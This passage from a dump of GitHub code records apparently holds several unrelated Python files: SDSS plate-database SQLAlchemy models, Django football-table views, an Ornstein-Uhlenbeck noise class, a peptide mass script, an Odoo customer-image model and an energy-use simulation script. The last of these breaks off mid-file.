DesignField.label.ilike('deccen')).one()\n dec = dec.value\n return dec\n except:\n return -1\n\n\nclass PluggingToInstrument(Base):\n\n __tablename__ = 'plugging_to_instrument'\n\n\nclass Exposure(Base):\n\n __tablename__ = 'exposure'\n\n def mjd(self):\n \"\"\"Returns the *SDSS* MJD.\n\n See line ~140 (the mjd4Gang function) here for notes on this value.\n https://svn.sdss.org/deprecated/operations/iop/trunk/etc/iopUtils.tcl\n \"\"\"\n\n return int(float(self.start_time) / 86400.0 + 0.3)\n\n def startTimeUT(self):\n\n return convert.mjd2ut(Decimal(self.start_time) / Decimal('86400'))\n\n def getHeaderValue(self, headerLabel):\n\n session = Session.object_session(self)\n try:\n keyValue = session.query(ExposureHeaderValue.value).join(\n Exposure, ExposureHeaderKeyword).filter(\n Exposure.pk == self.pk).filter(\n ExposureHeaderKeyword.label == headerLabel).first()\n\n return keyValue\n except:\n return '--'\n\n def whichLamp(self):\n session = Session.object_session(self)\n\n returnValue = '--'\n try:\n keyValue = session.query(ExposureHeaderValue).join(\n Exposure, ExposureHeaderKeyword).filter(Exposure.pk == self.pk).filter(\n ExposureHeaderKeyword.label == 'LAMPTHAR').first()\n if keyValue.value.strip() == '1':\n returnValue = 'ThAr'\n\n except:\n pass\n\n try:\n keyValue = session.query(ExposureHeaderValue).join(\n Exposure, ExposureHeaderKeyword).filter(Exposure.pk == self.pk).filter(\n ExposureHeaderKeyword.label == 'LAMPUNE').first()\n if keyValue.value.strip() == '1':\n returnValue = 'UNe'\n\n except:\n pass\n try:\n keyValue = session.query(ExposureHeaderValue).join(\n Exposure, ExposureHeaderKeyword).filter(Exposure.pk == self.pk).filter(\n ExposureHeaderKeyword.label == 'LAMPQRTZ').first()\n if keyValue.value.strip() == '1':\n returnValue = 'QRTZ'\n except:\n pass\n\n return returnValue\n\n def calcSecZ(self):\n\n session = Session.object_session(self)\n\n try:\n keyValue = session.query(ExposureHeaderValue).join(\n Exposure, ExposureHeaderKeyword).filter(\n Exposure.pk == self.pk).filter(\n ExposureHeaderKeyword.label == 'ALT').first()\n secZ = 1 / math.cos(90.0 - float(keyValue.value))\n return round(secZ, 3)\n except:\n return '--'\n\n\nclass ExposureFlavor(Base):\n\n __tablename__ = 'exposure_flavor'\n\n def __repr__(self):\n return f''\n\n\nclass ExposureStatus(Base):\n\n __tablename__ = 'exposure_status'\n\n def __repr__(self):\n return f''\n\n\nclass CameraFrame(Base):\n\n __tablename__ = 'camera_frame'\n\n\nclass Observation(Base):\n\n __tablename__ = 'observation'\n\n def startTime(self):\n\n session = Session.object_session(self)\n\n try:\n start_time = session.query(func.min(Exposure.start_time)).join(\n Observation).filter(Exposure.observation == self).one()\n except BaseException:\n return None\n\n return start_time[0]\n\n def endTime(self):\n session = Session.object_session(self)\n\n try:\n end_time = session.query(func.max(func.sum(Exposure.start_time,\n Exposure.exposure_time))).join(\n Observation).filter(Exposure.observation == self).one()\n except:\n return None\n\n return end_time[0]\n\n def sumOfCamera(self, cameraLabel, mjd=None):\n\n if mjd is not None:\n totsn2 = sum([\n sum([cf.sn2 for cf in x.cameraFrames\n if (cf.camera.label == cameraLabel and\n cf.exposure.flavor.label == 'Science' and\n cf.exposure.status.label == 'Good' and\n cf.sn2 > 0.2)])\n for x in self.exposures if mjd == int(x.start_time / (24 * 60 * 60))])\n else:\n totsn2 = sum([sum([cf.sn2 for cf in x.cameraFrames\n if (cf.camera.label == cameraLabel and\n cf.exposure.flavor.label == 'Science' and\n cf.exposure.status.label == 'Good' and\n cf.sn2 > 0.2)]) for x in self.exposures])\n\n return totsn2\n\n def numOfScienceExposures(self):\n\n session = Session.object_session(self)\n\n try:\n value = session.query(Exposure).join(ExposureFlavor).filter(\n Exposure.observation_pk == self.pk).filter(\n ExposureFlavor.label == 'Science').count()\n return value\n except:\n return -1\n\n def numOfObjectExposures(self):\n session = Session.object_session(self)\n\n try:\n value = session.query(Exposure).join(ExposureFlavor).filter(\n Exposure.observation_pk == self.pk).filter(\n ExposureFlavor.label == 'Object').count()\n return value\n except:\n return -1\n\n def numOfApogeePlates(self):\n session = Session.object_session(self)\n\n try:\n value = session.query(Plate).join(\n Plugging, Observation, PlateToSurvey, Survey).filter(\n Observation.mjd == self.mjd).filter(Survey.label == 'APOGEE').count()\n return value\n except:\n return -1\n\n def __repr__(self):\n return f''\n\n\nclass ObservationStatus(Base):\n\n __tablename__ = 'observation_status'\n\n def __repr__(self):\n return f''\n\n\nclass Pointing(Base):\n\n __tablename__ = 'pointing'\n\n def platePointing(self, plateid):\n session = Session.object_session(self)\n try:\n pp = session.query(PlatePointing).join(Plate, Pointing).filter(\n Pointing.pk == self.pk).filter(Plate.plate_id == plateid).one()\n except sqlalchemy.orm.exc.NoResultFound:\n print(f'A PlatePointing record for this pointing (pk={self.pk}) '\n f'was not be found (plate id={self.plate_id}).')\n print('It looks like that plate needs to be loaded into the database '\n '(see $PLATEDB_DIR/bin/platePlans2db.py)')\n pp = None\n return pp\n\n\nclass PlateInput(Base):\n\n __tablename__ = 'plate_input'\n\n\nclass PlatePointing(Base):\n\n __tablename__ = 'plate_pointing'\n\n def __repr__(self):\n return (f'')\n\n def times(self, datetimeObj):\n times_for_pp = dict()\n\n # All in degrees\n ra = float(self.pointing.center_ra)\n ha = float(self.hour_angle)\n LST = (ra + ha) / 15.0 # convert to hours\n\n gmst_h, gmst_m, gmst_s = convert.lst2gmst(apo_lon, LST)\n utc = convert.gmst2utcDatetime(\n datetime.datetime(datetimeObj.year, datetimeObj.month,\n datetimeObj.day, gmst_h, gmst_m, int(gmst_s)))\n\n times_for_pp['nominal'] = utc\n\n try:\n # Error is thrown when ha_min or ha_max == None (i.e. not available)\n ha_min = float(self.ha_observable_min)\n ha_max = float(self.ha_observable_max)\n\n LST_min = (ra + ha_min) / 15.0 # convert to hours\n gmst_min_h, gmst_min_m, gmst_min_s = convert.lst2gmst(apo_lon, LST_min)\n utc_min = convert.gmst2utcDatetime(\n datetime.datetime(datetimeObj.year, datetimeObj.month,\n datetimeObj.day, gmst_min_h, gmst_min_m,\n int(gmst_min_s)))\n\n LST_max = (ra + ha_max) / 15.0 # convert to hours\n gmst_max_h, gmst_max_m, gmst_max_s = convert.lst2gmst(apo_lon, LST_max)\n utc_max = convert.gmst2utcDatetime(\n datetime.datetime(datetimeObj.year,\n datetimeObj.month,\n datetimeObj.day,\n gmst_max_h,\n gmst_max_m,\n int(gmst_max_s)))\n\n times_for_pp['min'] = utc_min\n times_for_pp['max'] = utc_max\n\n except TypeError:\n # default to +- 1hr if values not found in database\n times_for_pp['min'] = utc + datetime.timedelta(hours=-1)\n times_for_pp['max'] = utc + datetime.timedelta(hours=+1)\n\n # correct for dates crossing the day line\n if times_for_pp['min'] > times_for_pp['nominal']:\n times_for_pp['min'] = times_for_pp['min'] + datetime.timedelta(days=-1)\n\n if times_for_pp['max'] < times_for_pp['nominal']:\n times_for_pp['max'] = times_for_pp['max'] + datetime.timedelta(days=+1)\n\n return times_for_pp\n\n def skyBrightness(self, datetimeObj=None, mjd=None):\n if datetimeObj is None and mjd is None:\n return None\n elif mjd is None and datetimeObj is not None:\n mjd = convert.datetime2mjd(datetimeObj)\n elif datetimeObj is None and mjd is not None:\n mjd = float(mjd)\n else:\n return None\n\n # Create an RADec object for the current pointing\n ra = float(self.pointing.center_ra)\n dec = float(self.pointing.center_dec)\n\n skyMag = Moon.mjdRADec2skyBright(mjd, ra, dec)\n\n if skyMag == 0.0:\n skyMag = '--'\n else:\n skyMag = '%.1f' % skyMag\n\n return skyMag\n\n def HA(self, datetimeObj=datetime.datetime.now()):\n # Compute the hour angle of the platePointing for the given datetime object\n gmstDatetime = convert.utcDatetime2gmst(datetimeObj)\n lst = convert.gmstDatetime2lstDatetime(apo_lon, gmstDatetime)\n\n lstDegrees = convert.datetime2decimalTime(lst) * 15.0\n ha = lstDegrees - float(self.pointing.center_ra)\n\n if ha < -180.0:\n ha += 360.0\n elif ha > 180.0:\n ha -= 360.0\n\n return ha\n\n def altitude(self, datetimeObj=datetime.datetime.now()):\n ra = float(self.pointing.center_ra)\n dec = float(self.pointing.center_dec)\n alt, az = convert.raDec2AltAz(ra, dec, apo_lat, apo_lon, datetimeObj)\n\n return alt\n\n def azimuth(self, datetimeObj=datetime.datetime.now()):\n ra = float(self.pointing.center_ra)\n dec = float(self.pointing.center_dec)\n alt, az = convert.raDec2AltAz(ra, dec, apo_lat, apo_lon, datetimeObj)\n\n return az\n\n\nclass PlatePointingToPointingStatus(Base):\n\n __tablename__ = 'plate_pointing_to_pointing_status'\n\n\nclass PointingStatus(Base):\n\n __tablename__ = 'pointing_status'\n\n\nclass Instrument(Base):\n\n __tablename__ = 'instrument'\n\n\nclass Profilometry(Base):\n\n __tablename__ = 'profilometry'\n\n\nclass ProfilometryMeasurement(Base):\n\n __tablename__ = 'prof_measurement'\n\n def __repr__(self):\n return (f'')\n\n\nclass ProfilometryTolerances(Base):\n\n __tablename__ = 'prof_tolerances'\n\n\nclass Camera(Base):\n\n __tablename__ = 'camera'\n\n\nclass BossSN2Threshold(Base):\n\n __tablename__ = 'boss_sn2_threshold'\n\n\nclass BossPluggingInfo(Base):\n\n __tablename__ = 'boss_plugging_info'\n\n\nclass PluggingStatus(Base):\n\n __tablename__ = 'plugging_status'\n\n\nclass PlateHolesFile(Base):\n\n __tablename__ = 'plate_holes_file'\n\n def __repr__(self):\n return f''\n\n\nclass Fiber(Base):\n\n __tablename__ = 'fiber'\n\n def __repr__(self):\n return f''\n\n\nclass ExposureHeaderValue(Base):\n\n __tablename__ = 'exposure_header_value'\n\n def keyword(self):\n if self.keyword is None:\n return None\n else:\n return self.keyword.label\n\n def __repr__(self):\n return f''\n\n\nclass ExposureHeaderKeyword(Base):\n\n __tablename__ = 'exposure_header_keyword'\n\n def __repr__(self):\n return f''\n\n\nclass PlateHole(Base):\n\n __tablename__ = 'plate_hole'\n\n def __repr__(self):\n return f''\n\n\nclass CmmMeas(Base):\n\n __tablename__ = 'cmm_meas'\n\n def getHoles(self, label):\n \"\"\"Returns a list of holes with plateHoleType.label == label.\"\"\"\n\n session = Session.object_session(self)\n return session.query(PlateHole).join(HoleMeas, PlateHoleType, CmmMeas).filter(\n CmmMeas.pk == self.pk, PlateHoleType.label == label).all()\n\n def __repr__(self):\n return f''\n\n\nclass HoleMeas(Base):\n\n __tablename__ = 'hole_meas'\n\n def __repr__(self):\n return f''\n\n\nclass PlateHoleType(Base):\n\n __tablename__ = 'plate_hole_type'\n\n def __repr__(self):\n return f''\n\n\nclass ObjectType(Base):\n\n __tablename__ = 'object_type'\n\n def __repr__(self):\n return f''\n\n\nclass ApogeeThreshold(Base):\n\n __tablename__ = 'apogee_threshold'\n\n def __repr__(self):\n return f''\n\n\nclass SurveyMode(Base):\n\n __tablename__ = 'survey_mode'\n\n\ndef define_relations():\n \"\"\"Defines the relations between tables.\n\n This function is called when the base is prepared. It must be added as the\n ``_define_relations`` attribute to the base.\n\n \"\"\"\n\n PlateRun.plates = relation(Plate, order_by=Plate.plate_id, backref='platerun')\n\n Plate.design = relation(Design, primaryjoin=(Plate.design_pk == Design.pk), backref='plate')\n Plate.location = relation(PlateLocation, backref='plates')\n Plate.surveys = relation(Survey, secondary=PlateToSurvey.__table__, backref='plates')\n Plate.pluggings = relation(Plugging, order_by=Plugging.fscan_mjd, backref='plate')\n Plate.cmmMeasurements = relation(CmmMeas, backref='plate')\n Plate.currentSurveyMode = relation(SurveyMode,\n primaryjoin=(Plate.current_survey_mode_pk == SurveyMode.pk),\n backref='plates')\n\n PlatePointing.plate = relation(Plate, backref='plate_pointings')\n PlatePointing.pointing = relation(Pointing, backref='plate_pointings')\n PlatePointing.observations = relation(Observation, order_by='Observation.mjd.desc()',\n backref='plate_pointing')\n\n Plate.statuses = relation('PlateStatus',\n secondary=PlateToPlateStatus.__table__,\n backref='plates')\n Plate.completionStatus = relation(PlateCompletionStatus, backref='plates')\n\n PlateCompletionStatusHistory.plate = relation(Plate, backref='completionStatusHistory')\n PlateCompletionStatusHistory.completionStatus = relation(\n PlateCompletionStatus, backref='completionStatusHistory')\n\n Tile.plates = relation(Plate, order_by=Plate.plate_id, backref='tile')\n Tile.status = relation(TileStatus, backref='tiles')\n\n TileStatusHistory.tile = relation(Tile, backref='statusHistory')\n TileStatusHistory.status = relation(TileStatus, backref='statusHistory')\n\n Tile.ra = lambda self: self.plates[0].plate_pointings[0].pointing.center_ra\n Tile.dec = lambda self: self.plates[0].plate_pointings[0].pointing.center_dec\n\n Design.pointings = relation(Pointing, backref='design')\n Design.values = relation(DesignValue, backref='design')\n Design.inputs = relation(PlateInput, backref='design')\n\n DesignValue.field = relation(DesignField, backref='design_values')\n\n Plugging.cartridge = relation(Cartridge, backref='pluggings')\n Plugging.plplugmapm = relation(PlPlugMapM, backref='plugging')\n Plugging.instruments = relation(Instrument,\n secondary=PluggingToInstrument.__table__,\n backref='pluggings')\n Plugging.observations = relation(Observation, backref='plugging')\n Plugging.activePlugging = relation(ActivePlugging, backref='plugging')\n Plugging.status = relation(PluggingStatus, backref='pluggings')\n\n Observation.status = relation(ObservationStatus, backref='observations')\n Observation.exposures = relation(Exposure,\n backref='observation',\n order_by=(Exposure.start_time, Exposure.exposure_no))\n\n Exposure.camera = relation(Camera, backref='exposures')\n Exposure.survey = relation(Survey, backref='exposures')\n Exposure.flavor = relation(ExposureFlavor, backref='exposures')\n Exposure.status = relation(ExposureStatus, backref='exposures')\n Exposure.headerValues = relation(ExposureHeaderValue,\n order_by='ExposureHeaderValue.index',\n backref='exposure')\n ExposureHeaderValue.header = relation(ExposureHeaderKeyword, backref='headerValues')\n Exposure.surveyMode = relation(SurveyMode, backref='exposures')\n\n Camera.instrument = relation(Instrument, backref='cameras')\n\n CameraFrame.camera = relation(Camera, backref='cameraFrames')\n CameraFrame.exposure = relation(Exposure, backref='cameraFrames')\n\n Gprobe.cartridge = relation(Cartridge, backref='gprobes')\n\n BossPluggingInfo.plugging = relation(Plugging, backref='bossPluggingInfo')\n\n BossSN2Threshold.camera = relation(Camera, backref='bossSN2Threshold')\n\n Profilometry.plugging = relation(Plugging, backref='profilometries')\n Profilometry.measurements = relation(ProfilometryMeasurement,\n backref='profilometry',\n order_by='ProfilometryMeasurement.number',\n cascade='all, delete, delete-orphan')\n Profilometry.tolerances = relation(ProfilometryTolerances, backref='profilometry')\n ProfilometryTolerances.survey = relation(Survey, backref='profilometry_tolerances')\n\n PlateHolesFile.plate = relation(Plate, backref='plateHolesFile')\n\n PlPlugMapM.fibers = relation(Fiber, backref='plPlugMapM')\n\n Fiber.plateHoles = relation(PlateHole, backref='fiber')\n\n PlateHole.plateHoleType = relation(PlateHoleType, backref='plateHole')\n PlateHole.plateHolesFile = relation(PlateHolesFile, backref='plateHole')\n PlateHole.objectType = relation(ObjectType, backref='plateHole')\n\n CmmMeas.measHoles = relation(HoleMeas, backref='cmmMeas')\n\n HoleMeas.plateHole = relation(PlateHole, backref='holeMeas')\n\n\n# Adds the base to the database connection.\ndatabase.add_base(Base)\n","repo_name":"sdss/sdssdb","sub_path":"python/sdssdb/sqlalchemy/operationsdb/platedb.py","file_name":"platedb.py","file_ext":"py","file_size_in_byte":40377,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"34097905511","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import Posicion, Goleador, Tarjeta\nfrom .forms import PosicionForm, GoleadorForm, TarjetaForm\n\n\nfrom rest_framework import viewsets\nfrom .serializers import PosicionSerializer, GoleadorSerializer, TarjetaSerializer\n# Create your views here.\n\n\ndef Position_list(request): # lista de jornadas\n\tqueryset = Posicion.objects.all().order_by(\"posicion\")\n\tcontext = {\n\t\t'template_title': 'Tabla de Posiciones',\n\t\t'object_list': queryset,\n\t}\n\treturn render(request, 'tablas/position_list.html', context)\n\n\ndef Position_update(request, id=None):\n\tinstance = get_object_or_404(Posicion, id=id)\n\tformjact = PosicionForm(request.POST or None, instance=instance)\n\tif formjact.is_valid():\n\t\tinstance = formjact.save(commit=False)\n\t\tinstance.save()\n\t\t# messages.success(request, \"Jornada guardada\")\n\t\t# return HttpResponseRedirect(instance.get_absolute_url())\n\t\treturn redirect(\"tablas:list\")\n\n\tcontext = {\n\t\t\"template_title\": 'Actualizar ' + instance.equipo,\n\t\t\"instance\": instance,\n\t\t\"btn_name\": \"Editar\",\n\t\t\"form\": formjact\n\t}\n\treturn render(request, 'tablas/tabla_create.html', context)\n\n\ndef Goldeador_list(request):\n queryset = Goleador.objects.all().order_by(\"-goles\")\n\n context = {\n 'template_title': 'Tabla de Goleadores',\n 'object_list': queryset\n }\n return render(request, 'tablas/goleador_list.html', context)\n\n\ndef goleador_create(request):\n\tform = GoleadorForm(request.POST or None, request.FILES or None)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\t# messages.success(request, \"Creado satisfactoriamente\")\n\t\t# return HttpResponseRedirect(instance.get_absolute_url())\n\t\treturn redirect(\"tablas:gol_list\")\n\n\tcontext = {\n\t\t\"template_title\": 'Nuevo goleador',\n\t\t\"btn_name\": \"Crear\",\n\t\t'form': form\n\t}\n\treturn render(request, 'tablas/goleador_create.html', context)\n\n\ndef goleador_update(request, id=None):\n\tinstance = get_object_or_404(Goleador, id=id)\n\tform = GoleadorForm(request.POST or None,request.FILES or None, instance=instance)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\t# messages.success(request, \"Jornada guardada\")\n\t\t# return HttpResponseRedirect(instance.get_absolute_url())\n\t\treturn redirect(\"tablas:gol_list\")\n\n\tcontext = {\n\t\t\"template_title\": 'Actualizar ' + instance.jugador,\n\t\t\"instance\": instance,\n\t\t\"btn_name\": \"Editar\",\n\t\t\"form\": form\n\t}\n\treturn render(request, 'tablas/goleador_create.html', context)\n\n\n\n\ndef tarjetas_list(request): # lista de jornadas\n\tqueryset = Tarjeta.objects.all().order_by(\"-amarillas\")\n\tcontext = {\n\t\t'template_title': 'Tabla de Tarjetas',\n\t\t'object_list': queryset,\n\t}\n\treturn render(request, 'tablas/tarjeta_list.html', context)\n\n\n\ndef tarjeta_create(request):\n\tform = TarjetaForm(request.POST or None)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\t# messages.success(request, \"Creado satisfactoriamente\")\n\t\t# return HttpResponseRedirect(instance.get_absolute_url())\n\t\treturn redirect(\"tablas:tarj_list\")\n\n\tcontext = {\n\t\t\"template_title\": 'Crear nueva tarjeta',\n\t\t\"btn_name\": \"Crear\",\n\t\t'form': form\n\t}\n\treturn render(request, 'tablas/tarjeta_create.html', context)\n\n\ndef tajeta_update(request, id=None):\n\tinstance = get_object_or_404(Tarjeta, id=id)\n\tform = TarjetaForm(request.POST or None, instance=instance)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\t# messages.success(request, \"Jornada guardada\")\n\t\t# return HttpResponseRedirect(instance.get_absolute_url())\n\t\treturn redirect(\"tablas:tarj_list\")\n\n\tcontext = {\n\t\t\"template_title\": 'Actualizar ' + instance.jugador,\n\t\t\"instance\": instance,\n\t\t\"btn_name\": \"Editar\",\n\t\t\"form\": form\n\t}\n\treturn render(request, 'tablas/tarjeta_create.html', context)\n\n\n\n#------------ API POSICIONES-----------------------------------------\nclass PosicionViewset(viewsets.ModelViewSet):\n\tqueryset = Posicion.objects.all().order_by(\"posicion\")\n\tserializer_class = PosicionSerializer\n\n\n#------------ API GOLEADOR-----------------------------------------\nclass GoleadorViewset(viewsets.ModelViewSet):\n\tqueryset = Goleador.objects.all().order_by(\"-goles\")\n\tserializer_class = GoleadorSerializer\n\n#------------ API TARJETAS-----------------------------------------\nclass TarjetaViewset(viewsets.ModelViewSet):\n\tqueryset = Tarjeta.objects.all().order_by(\"-amarillas\")\n\tserializer_class = TarjetaSerializer\n","repo_name":"edgon85/proyectox","sub_path":"golchivoapp/apps/tablas/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27419356430","text":"import numpy as np\n\n\nclass OrnsteinUhlenbeckNoise:\n \"\"\" To implement exploration of the actor network, we use noise\n perturbations; this process samples noise from a correlated normal\n distribution \"\"\"\n\n def __init__(self,\n mean: int = 0,\n deviation: int = 0.2,\n shape: tuple = (1),\n theta: float = 0.15,\n time_step: float = 1e-2,\n initial_value: float = None):\n \n self.mean = np.ones(shape) * mean\n self.deviation = np.ones(shape) * deviation\n\n self.theta = theta\n self.time_step = time_step\n self.initial_value = initial_value\n\n self.previous_value = None\n self.reset()\n\n def __call__(self):\n value = (self.previous_value\n + self.theta * (self.mean - self.previous_value) * self.time_step\n + self.deviation \n * np.sqrt(self.time_step) \n * np.random.normal(size=self.mean.shape))\n \n self.previous_value = value\n return value\n \n def reset(self):\n if self.initial_value is not None:\n self.previous_value = self.initial_value\n else:\n self.previous_value = np.zeros_like(self.mean)","repo_name":"inigo-selwood-imperial/somas-coursework-2022","sub_path":"source/learning/ornstein_uhlenbeck_noise.py","file_name":"ornstein_uhlenbeck_noise.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71853196266","text":"from os.path import dirname\n\npeptides = 'NQEL'\n\nmassTable = open(dirname(__file__)+'integer_mass_table.txt').read().strip().split('\\n')\nfor i in range(len(massTable)):\n\tmassTable[i] = massTable[i].split()\nmassTable = dict(massTable)\n\nelements = []\nfor k in range(1,len(peptides)):\n\tfor i in range(len(peptides)):\n\t\telement = peptides[i:i+k]\n\t\tif k-len(peptides)+i>0:\n\t\t\telement += peptides[:k-len(peptides)+i]\n\t\telements.append(element)\nelements.append(peptides)\nprint(elements)\nprint(0,end='')\n\ndef GetMass(text):\n\tmass = 0\n\tfor i in text:\n\t\tmass += int(massTable[i])\n\treturn mass\n\nfor i in elements:\n\tprint(' ',end='')\n\tprint(GetMass(i),end='')\n#\nprint('\\n',[[int(i)] for i in massTable.values() ])","repo_name":"luoguanghao/bioinfo_algo_script","sub_path":"M2_week3_GenerateTheoreticalSpectrum.py","file_name":"M2_week3_GenerateTheoreticalSpectrum.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4091501645","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\nfrom datetime import datetime\nfrom odoo.exceptions import except_orm, ValidationError\nfrom odoo import sys, os\nimport base64, time\nfrom os.path import join\n\n\n# sys.setdefaultencoding('utf-8')\n# Create Folder\nsource_folder_path = os.path.dirname(__file__)\nindex_folder_path = source_folder_path.find('addons_custom')\nif source_folder_path[index_folder_path - 1] != '\\\\' and source_folder_path[index_folder_path - 1] != '/':\n folder_path = source_folder_path[:index_folder_path] + '/filestore_dir/partner_files'\nelse:\n folder_path = source_folder_path[:index_folder_path] + 'filestore_dir/partner_files'\nif not os.path.exists(folder_path):\n os.mkdir(folder_path)\nfolder_path = folder_path + '/'\nNUMBER_SEQUENCE = 1\n\n\nclass Image(models.Model):\n _name = \"izi.images.profile.customer\"\n\n name = fields.Char()\n image = fields.Binary('Image', attachment=True)\n # image_name= fields.Char('Image Name')\n partner_id = fields.Many2one('res.partner', \"Partner\")\n path = fields.Char(string='Path')\n\n # @api.onchange('image')\n # def onchange_image(self):\n # if self.image:\n # # name, extension = self.get_file_extension(self.name)\n # # self.name = name + '(' + datetime.datetime.now().strftime('%Y%m%d-%H%M%S') + ')' + extension\n # try:\n #\n # os.mkdir(folder_path + str(self.partner_id.x_code))\n # except FileExistsError:\n # pass\n # except Exception as e:\n # pass\n # image_full_path = join( folder_path, str(self.partner_id.x_code), str(str(datetime.now().date()) + '_' + str(time.time())) )\n # f = open( image_full_path , 'wb')\n # f.write(base64.b64decode(self.image))\n # f.close()\n # # print(\"file name\", image_full_path)\n # os.rename(image_full_path, image_full_path+'.png')\n #\n @api.model\n def create(self, vals):\n res = super(Image, self).create(vals)\n if res.image:\n # name, extension = self.get_file_extension(self.name)\n # self.name = name + '(' + datetime.datetime.now().strftime('%Y%m%d-%H%M%S') + ')' + extension\n try:\n\n os.mkdir(folder_path + str(res.partner_id.x_code))\n except FileExistsError:\n pass\n except Exception as e:\n pass\n image_full_path = join( folder_path, str(res.partner_id.x_code), str(str(datetime.now().date()) + '_' + str(time.time())) )\n f = open( image_full_path , 'wb')\n f.write(base64.b64decode(res.image))\n f.close()\n # print(\"file name\", image_full_path)\n os.rename(image_full_path, image_full_path+'.png')\n return res\n # @api.multi\n # def create(self):\n # super(Image,self).create()\n #\n\n\n def get_file_extension(self, path):\n filename, file_extension = os.path.splitext(path)\n return filename, file_extension\n\n","repo_name":"butagreeza/korea_spa","sub_path":"addons_custom/res_partner_custom/models/image_profile_customer.py","file_name":"image_profile_customer.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9466213039","text":"# 1209. Sum\n# Level D3\n# Site: https://swexpertacademy.com/main/code/problem/problemList.do\n\nfor _ in range(10):\n tc = int(input())\n brd = [list(map(int, input().split())) for _ in range(100)]\n brd2 = []\n for x in range(100):\n line = []\n for y in range(100):\n line.append(brd[y][x])\n brd2.append(line)\n\n answer = 0\n for i in range(100):\n maxV = max(sum(brd[i]), sum(brd2[i]))\n if maxV > answer:\n answer = maxV\n\n cross1, cross2 = 0, 0\n for i in range(100):\n cross1 += brd[i][i]\n cross2 += brd2[i][i]\n\n answer = max(answer, cross2, cross1)\n\n print(f'#{tc} {answer}')\n","repo_name":"Panseung/algo_python_2023","sub_path":"SWEA_D3/230626/1209.py","file_name":"1209.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7796072737","text":"from graph_data import make_graph,show_graph\n'''\nSimulates the device using a file that denotes whether a device is on or off at any given time with\nwith intervals designated in a csv file that follows the format\n\n device,state,on/off\n \n ie\n \n tv,on,111111010101111110000011111\n'''\n#from test.test_wsgiref import IntegrationTests #This line is potentially extraneous\nimport csv\n\n\ndef write_to_ifile(file_name: str, integration_period:int, input_generators: list):\n '''writes the strings generated by the string generators onto the input csv'''\n with open(file_name, 'w') as outfile:\n to_write = 'sample_rate:{}\\n'.format(integration_period)\n for input_generator in input_generators:\n to_write += input_generator.generate_str()\n outfile.write(to_write)\n \ndef write_to_peramfile(file_name: str, integration_period: int, device_map: dict):\n '''writes the strings generated by the string generators onto the input csv'''\n with open(file_name, 'w') as outfile:\n to_write = 'sample_rate:{}\\n'.format(integration_period)\n to_write += str(device_map)\n outfile.write(to_write)\n \ndef make_integral_array(power_array: list, integration_period: int):\n to_return = [0]\n for i in range(len(power_array)-1):\n to_return.append(energy_used(power_array[i:i+2], integration_period) + to_return[-1])\n return to_return\n\ndef write_to_csv(file_name, power_array: list, integral_array: list, integration_time):\n time_array = list(range(0, len(power_array)*integration_time, integration_time))\n with open(file_name, 'w+', newline='') as csv_file:\n csv_writer = csv.writer(csv_file, delimiter=',',\n quotechar='|', quoting=csv.QUOTE_MINIMAL)\n csv_file.write('time,')\n csv_writer.writerow(time_array)\n csv_file.write('power,')\n csv_writer.writerow(power_array)\n csv_file.write('energy,')\n csv_writer.writerow(integral_array)\n \n csv_file.close()\n \ndef analyze_data(file_name: str, integration_period: int, device_map: dict):\n power_map = parse_inputfile(file_name, device_map)\n power_matrix = list(power_map.values()) \n power_array = flatten_cols(power_matrix)\n integral_array = make_integral_array(power_array, integration_period)\n \n print('\\nEnergy Used: ', integral_array[-1], 'Watt-hours')\n make_graph(power_array, integration_period,'', 'Power (W)', 'Power Consumed',sub=211)\n make_graph(integral_array, integration_period, 'Time (hr)', 'Energy (W*hr)', 'Energy Used',sub=212)\n write_to_csv('outputs/graph_file.csv', power_array, integral_array, integration_period)\n show_graph()\n \ndef analyze_data_nograph(file_name: str, integration_period: int, device_map: dict):\n power_map = parse_inputfile(file_name, device_map)\n power_matrix = list(power_map.values()) \n power_array = flatten_cols(power_matrix)\n integral_array = make_integral_array(power_array, integration_period)\n \n return (power_map, power_matrix, power_array, integral_array)\n \ndef energy_used(power_array, int_period: int):\n '''trapezoidal riemman sum estimate of the amount of power used'''\n return (sum(power_array[1:])/3600*int_period + sum(power_array[:len(power_array)-1])/3600*int_period)/2\n\ndef make_int_array(size, start_value=0):\n '''returns an int list of length size with values start_value, default being 0'''\n to_return = []\n for i in range(size):\n to_return.append(0)\n \n return to_return\n\ndef flatten_cols(matrix: [list])->list:\n '''flatten a matrix by m by n into a array of size m by adding columns together\n ie\n | a_00 a_10 ... a_m0 |\n | a_01 ............. |\n | ................. | = [a_00 + a_01 + .. + a_0n, a_10 + a_11 + ... + a_1n, a_m0 + a_m1 + ... + a_mn]\n | a_0n ........ a_mn |\n '''\n \n to_return = []\n size = len(matrix[0])\n \n for j in range(size):\n to_append = 0\n for i in range(len(matrix)):\n assert(len(matrix[i]) == size)\n to_append += matrix[i][j]\n to_return.append(to_append)\n \n return to_return\n\ndef read_from_peramfile(file_name: str): #not fully implemented yet\n with open(file_name, 'r') as infile:\n read_integration_period_temp = infile.readline().strip() #Read first line only for integration period\n read_integration_period = read_integration_period_temp[12:] #read only the number in the first line\n read_device_map = {}\n cache = infile.readlines()[0:] #dumb read-in of string in file - start after header\n # loop through lines\n for line in cache:\n # skip lines starting with \"--\".\n if not line.startswith(\"--\"):\n # replace random amount of spaces (\\s) with tab (\\t),\n # strip the 